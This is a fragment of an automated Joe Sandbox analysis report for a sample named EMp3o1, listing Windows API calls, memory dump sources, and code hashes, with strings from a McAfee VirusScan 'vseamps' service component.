                                                • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 1232609184-0
                                                • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                • String ID: H
                                                • API String ID: 2107338056-2852464175
                                                • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                • API String ID: 1322048431-2685357988
                                                • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                • API String ID: 2984211723-3002863673
                                                • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                • API String ID: 678758403-4129911376
                                                • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen
                                                • String ID:
                                                • API String ID: 3424473247-0
                                                • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                • String ID: bad exception$csm$csm$csm
                                                • API String ID: 3766904988-820278400
                                                • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                • String ID:
                                                • API String ID: 2707001247-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 849930591-393685449
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressFreeLibraryProc
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3013587201-537541572
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                • API String ID: 1119674940-1966266597
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                • API String ID: 3702919091-996641649
                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$Info
                                                • String ID:
                                                • API String ID: 1775632426-0
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871B1
                                                • GetLastError.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871BF
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871E9
                                                • FreeLibrary.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC087257
                                                • GetProcAddress.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC087263
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value$ErrorLast
                                                • String ID:
                                                • API String ID: 2506987500-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                APIs
                                                • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                  • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                  • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                  • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                  • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                  • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                  • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                  • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                  • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                  • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                  • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                  • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                  • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                  • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                  • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                  • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                  • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                  • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                • String ID: vseamps
                                                • API String ID: 3197017603-3944098904
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Messagesprintf_s
                                                • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                • API String ID: 2642950106-3610746849
                                                • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
